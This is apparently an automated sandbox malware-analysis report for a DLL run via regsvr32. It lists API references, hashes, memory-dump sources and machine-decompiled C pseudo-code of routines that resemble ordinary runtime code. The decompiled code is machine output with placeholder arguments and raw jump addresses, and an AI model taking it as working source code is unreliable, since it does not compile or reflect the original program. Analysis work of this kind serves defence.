                                                                                                        • Instruction Fuzzy Hash: 7541D22EB19E6E41FA129B1698081F57299BF85BF0FC88135CD1D4B788DE7CE465C320
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                        • Instruction ID: e2effe98d87d9dc5264448f6107d877a3cf1a5cd0dbbc7a2d10c8059b1f8cc51
                                                                                                        • Opcode Fuzzy Hash: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                        • Instruction Fuzzy Hash: 2F21601CA0CEBE81F968573156452F9616A5FC47B0FC44674D87E0B6C6EDBCB471C220
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                        • String ID: CONOUT$
                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                        • Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction ID: 1303783840f770421fa7adeb12be0ab5c2167f84864ddf3d5bdc49c0a0b68446
                                                                                                        • Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction Fuzzy Hash: 8B11B125B18E6986F7508B12E8447A9B2A4FB88BF4F440334EA1E87794DFBCD874C754
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBA5B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBA91
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBABE
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBACF
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBAE0
                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000,00007FFC123DD8B7,?,?,?), ref: 00007FFC123DBAFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                        • Instruction ID: fdfaf5066e2ae6911cd4c5a3d6f463fe435892df96c8ccceb7cbb5b60f3477b9
                                                                                                        • Opcode Fuzzy Hash: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                        • Instruction Fuzzy Hash: 7C115B2CB0CE7E81FA28673196552F9625A5F847B0FC44774E83E076C6EEACF461C620
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction ID: 531a27d0ef3f6a848a293fcbd6017ed95b90426d2a1b294a208ae83e2cbd8255
                                                                                                        • Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction Fuzzy Hash: A6F0A469A18F1A81FB144B14A4543F5A360EF887B0F840635C95D461E0CFBCD4A4C724
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00007FFC7FFC123DEB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                        				signed int _t27;
                                                                                                        				signed int _t28;
                                                                                                        				signed int _t29;
                                                                                                        				signed int _t30;
                                                                                                        				signed int _t31;
                                                                                                        				signed int _t42;
                                                                                                        				signed int _t43;
                                                                                                        				signed int _t44;
                                                                                                        				signed int _t46;
                                                                                                        				void* _t51;
                                                                                                        
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a16 = __rsi;
                                                                                                        				_t27 = __ecx & 0x0000001f;
                                                                                                        				if ((__ecx & 0x00000008) == 0) goto 0x123deb9a;
                                                                                                        				if (sil >= 0) goto 0x123deb9a;
                                                                                                        				E00007FFC7FFC123E1CEC(_t27, _t51);
                                                                                                        				_t28 = _t27 & 0xfffffff7;
                                                                                                        				goto 0x123debf1;
                                                                                                        				_t42 = 0x00000004 & dil;
                                                                                                        				if (_t42 == 0) goto 0x123debb5;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t42 >= 0) goto 0x123debb5;
                                                                                                        				E00007FFC7FFC123E1CEC(_t28, _t51);
                                                                                                        				_t29 = _t28 & 0xfffffffb;
                                                                                                        				goto 0x123debf1;
                                                                                                        				_t43 = dil & 0x00000001;
                                                                                                        				if (_t43 == 0) goto 0x123debd1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t43 >= 0) goto 0x123debd1;
                                                                                                        				E00007FFC7FFC123E1CEC(_t29, _t51);
                                                                                                        				_t30 = _t29 & 0xfffffffe;
                                                                                                        				goto 0x123debf1;
                                                                                                        				_t44 = dil & 0x00000002;
                                                                                                        				if (_t44 == 0) goto 0x123debf1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t44 >= 0) goto 0x123debf1;
                                                                                                        				if ((dil & 0x00000010) == 0) goto 0x123debee;
                                                                                                        				E00007FFC7FFC123E1CEC(_t30, _t51);
                                                                                                        				_t31 = _t30 & 0xfffffffd;
                                                                                                        				_t46 = dil & 0x00000010;
                                                                                                        				if (_t46 == 0) goto 0x123dec0b;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t46 >= 0) goto 0x123dec0b;
                                                                                                        				E00007FFC7FFC123E1CEC(_t31, _t51);
                                                                                                        				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                        			}













                                                                                                        0x7ffc123deb68
                                                                                                        0x7ffc123deb6d
                                                                                                        0x7ffc123deb7c
                                                                                                        0x7ffc123deb84
                                                                                                        0x7ffc123deb89
                                                                                                        0x7ffc123deb90
                                                                                                        0x7ffc123deb95
                                                                                                        0x7ffc123deb98
                                                                                                        0x7ffc123deb9f
                                                                                                        0x7ffc123deba2
                                                                                                        0x7ffc123deba4
                                                                                                        0x7ffc123deba9
                                                                                                        0x7ffc123debab
                                                                                                        0x7ffc123debb0
                                                                                                        0x7ffc123debb3
                                                                                                        0x7ffc123debb5
                                                                                                        0x7ffc123debb9
                                                                                                        0x7ffc123debbb
                                                                                                        0x7ffc123debc0
                                                                                                        0x7ffc123debc7
                                                                                                        0x7ffc123debcc
                                                                                                        0x7ffc123debcf
                                                                                                        0x7ffc123debd1
                                                                                                        0x7ffc123debd5
                                                                                                        0x7ffc123debd7
                                                                                                        0x7ffc123debdc
                                                                                                        0x7ffc123debe2
                                                                                                        0x7ffc123debe9
                                                                                                        0x7ffc123debee
                                                                                                        0x7ffc123debf1
                                                                                                        0x7ffc123debf5
                                                                                                        0x7ffc123debf7
                                                                                                        0x7ffc123debfc
                                                                                                        0x7ffc123dec03
                                                                                                        0x7ffc123dec21

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _set_statfp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1156100317-0
                                                                                                        • Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction ID: ed389dcea89579cab60383dccda5b00331274255d61b66539aba3abea1bc654f
                                                                                                        • Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction Fuzzy Hash: F411C42EE0CE3F01F66411A4D4563F918886FD8374EC40AB4FA6F462D6CEAC7865C134
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB33
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB52
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB7A
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB8B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC123D9403,?,?,00000000,00007FFC123D969E,?,?,?,?,?,00007FFC123D962A), ref: 00007FFC123DBB9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                        • Instruction ID: 7618589b8f0af28c810d924dce3d04b0a5157d3d5cc0699fd79788f38e0c6fa4
                                                                                                        • Opcode Fuzzy Hash: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                        • Instruction Fuzzy Hash: CF116D1CF0CE7E41FA6857315A422F9614A5FC47B4FC447B4D83D066DAEEACB421C620
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                        • Instruction ID: 4e3b8e300c0d031bb2e73bf718f5702e1c9bdef106970b446920a9b15d963653
                                                                                                        • Opcode Fuzzy Hash: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                        • Instruction Fuzzy Hash: 6211D61CA0CE6F41FD6CA23155562F9214A4FC4774FD447B5E83E0A2D2EDACB472D624
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC123E0958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				intOrPtr _t181;
                                                                                                        				signed int _t186;
                                                                                                        				signed int _t193;
                                                                                                        				signed int _t198;
                                                                                                        				void* _t212;
                                                                                                        				signed char _t213;
                                                                                                        				void* _t263;
                                                                                                        				signed long long _t264;
                                                                                                        				signed long long _t267;
                                                                                                        				long long _t269;
                                                                                                        				signed long long _t271;
                                                                                                        				long long _t276;
                                                                                                        				long long _t278;
                                                                                                        				long long _t280;
                                                                                                        				intOrPtr* _t289;
                                                                                                        				intOrPtr _t294;
                                                                                                        				long long _t295;
                                                                                                        				long long _t318;
                                                                                                        				void* _t326;
                                                                                                        				long long _t327;
                                                                                                        				void* _t328;
                                                                                                        				long long _t329;
                                                                                                        				long long _t331;
                                                                                                        				signed char* _t332;
                                                                                                        				signed char* _t333;
                                                                                                        				signed char* _t334;
                                                                                                        				intOrPtr* _t335;
                                                                                                        				void* _t336;
                                                                                                        				void* _t337;
                                                                                                        				signed long long _t338;
                                                                                                        				intOrPtr _t341;
                                                                                                        				signed long long _t343;
                                                                                                        				void* _t345;
                                                                                                        				intOrPtr* _t347;
                                                                                                        				intOrPtr _t351;
                                                                                                        				signed long long _t356;
                                                                                                        				signed long long _t359;
                                                                                                        				signed long long _t361;
                                                                                                        				void* _t364;
                                                                                                        				long long _t365;
                                                                                                        				long long _t367;
                                                                                                        				char _t368;
                                                                                                        				void* _t372;
                                                                                                        				signed char* _t373;
                                                                                                        				signed long long _t375;
                                                                                                        
                                                                                                        				_t263 = _t337;
                                                                                                        				_t336 = _t263 - 0x57;
                                                                                                        				_t338 = _t337 - 0xe0;
                                                                                                        				 *((long long*)(_t336 - 9)) = 0xfffffffe;
                                                                                                        				 *((long long*)(_t263 + 8)) = __rbx;
                                                                                                        				_t264 =  *0x1244e008; // 0x2d0c2734ea27
                                                                                                        				 *(_t336 + 0x17) = _t264 ^ _t338;
                                                                                                        				 *((long long*)(_t336 - 0x49)) = __r8;
                                                                                                        				_t289 = __rcx;
                                                                                                        				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
                                                                                                        				 *((long long*)(_t336 - 0x51)) = _t367;
                                                                                                        				 *(_t336 - 0x19) = __edx;
                                                                                                        				_t267 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x59) = _t267;
                                                                                                        				 *(_t336 - 0x11) = __edx;
                                                                                                        				_t375 = __edx + __edx * 8;
                                                                                                        				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
                                                                                                        				 *((long long*)(_t336 - 0x29)) = _t269;
                                                                                                        				r12d = r9d;
                                                                                                        				_t365 = _t364 + __r8;
                                                                                                        				 *((long long*)(_t336 - 0x71)) = _t365;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
                                                                                                        				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x123e09f8;
                                                                                                        				0x123d9140();
                                                                                                        				_t294 =  *((intOrPtr*)(_t367 + 0x18));
                                                                                                        				r8d =  *(_t294 + 0xc);
                                                                                                        				 *(_t336 - 0x5d) = r8d;
                                                                                                        				 *((long long*)(__rcx)) = _t269;
                                                                                                        				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x123e0db8;
                                                                                                        				_t271 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x21) = _t271;
                                                                                                        				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
                                                                                                        				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
                                                                                                        				r12d = 1;
                                                                                                        				if (r8d != 0xfde9) goto 0x123e0bc0;
                                                                                                        				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t271 * 8));
                                                                                                        				if ( *_t347 == dil) goto 0x123e0a74;
                                                                                                        				_t372 = _t329 + 1;
                                                                                                        				if (_t372 - 5 < 0) goto 0x123e0a61;
                                                                                                        				if (_t372 == 0) goto 0x123e0b52;
                                                                                                        				r12d =  *((char*)(_t294 + 0x7ffc1244e8f0));
                                                                                                        				r12d = r12d + 1;
                                                                                                        				_t181 = r12d - 1;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
                                                                                                        				_t341 = _t181;
                                                                                                        				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x123e0d27;
                                                                                                        				_t295 = _t329;
                                                                                                        				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
                                                                                                        				if (_t295 + 1 - _t372 < 0) goto 0x123e0ab9;
                                                                                                        				if (_t341 <= 0) goto 0x123e0aea;
                                                                                                        				E00007FFC7FFC123D64D0( *( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
                                                                                                        				_t318 = _t329;
                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
                                                                                                        				if (_t318 + 1 - _t372 < 0) goto 0x123e0aed;
                                                                                                        				 *((long long*)(_t336 - 0x41)) = _t329;
                                                                                                        				_t276 = _t336 - 1;
                                                                                                        				 *((long long*)(_t336 - 0x39)) = _t276;
                                                                                                        				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                                                        				r12d = _t186;
                                                                                                        				r8d = _t186;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t367;
                                                                                                        				E00007FFC7FFC123E1744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
                                                                                                        				if (_t276 == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
                                                                                                        				goto 0x123e0c55;
                                                                                                        				_t368 =  *((char*)(_t276 + 0x7ffc1244e8f0));
                                                                                                        				_t212 = _t368 + 1;
                                                                                                        				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
                                                                                                        				if (_t212 - _t343 > 0) goto 0x123e0d55;
                                                                                                        				 *((long long*)(_t336 - 0x69)) = _t329;
                                                                                                        				 *((long long*)(_t336 - 0x31)) = _t331;
                                                                                                        				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                                                        				r14d = _t193;
                                                                                                        				r8d = _t193;
                                                                                                        				_t278 =  *((intOrPtr*)(_t336 - 0x51));
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t278;
                                                                                                        				E00007FFC7FFC123E1744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
                                                                                                        				if (_t278 == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t332 = _t331 + _t368;
                                                                                                        				r12d = r14d;
                                                                                                        				goto 0x123e0c55;
                                                                                                        				_t359 =  *(_t336 - 0x59);
                                                                                                        				_t351 =  *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t359 * 8));
                                                                                                        				_t213 =  *(_t351 + 0x3d + _t375 * 8);
                                                                                                        				if ((_t213 & 0x00000004) == 0) goto 0x123e0bf7;
                                                                                                        				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
                                                                                                        				 *((char*)(_t336 + 8)) =  *_t332;
                                                                                                        				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
                                                                                                        				r8d = 2;
                                                                                                        				goto 0x123e0c40;
                                                                                                        				r8d =  *_t332 & 0x000000ff;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x123e0c3a;
                                                                                                        				_t373 =  &(_t332[1]);
                                                                                                        				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x123e0d93;
                                                                                                        				r8d = 2;
                                                                                                        				if (E00007FFC7FFC123DE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t333 = _t373;
                                                                                                        				goto 0x123e0c55;
                                                                                                        				_t198 = E00007FFC7FFC123DE960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
                                                                                                        				if (_t198 == 0xffffffff) goto 0x123e0db8;
                                                                                                        				_t334 =  &(_t333[1]);
                                                                                                        				 *((long long*)(_t338 + 0x38)) = _t329;
                                                                                                        				 *((long long*)(_t338 + 0x30)) = _t329;
                                                                                                        				 *((intOrPtr*)(_t338 + 0x28)) = 5;
                                                                                                        				_t280 = _t336 + 0xf;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t280;
                                                                                                        				r9d = r12d;
                                                                                                        				_t345 = _t336 - 0x7d;
                                                                                                        				E00007FFC7FFC123DD698();
                                                                                                        				r14d = _t198;
                                                                                                        				if (_t198 == 0) goto 0x123e0db8;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				r8d = _t198;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x123e0db0;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x123e0db8;
                                                                                                        				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x123e0d10;
                                                                                                        				 *((short*)(_t338 + 0x40)) = 0xd;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				_t128 = _t280 - 0xc; // 0x1
                                                                                                        				r8d = _t128;
                                                                                                        				_t326 = _t338 + 0x40;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x123e0db0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x123e0db8;
                                                                                                        				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
                                                                                                        				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x123e0db8;
                                                                                                        				r8d =  *(_t336 - 0x5d);
                                                                                                        				goto 0x123e0a23;
                                                                                                        				if (_t326 <= 0) goto 0x123e0d50;
                                                                                                        				_t335 = _t334 - _t373;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
                                                                                                        				if (1 - _t326 < 0) goto 0x123e0d2f;
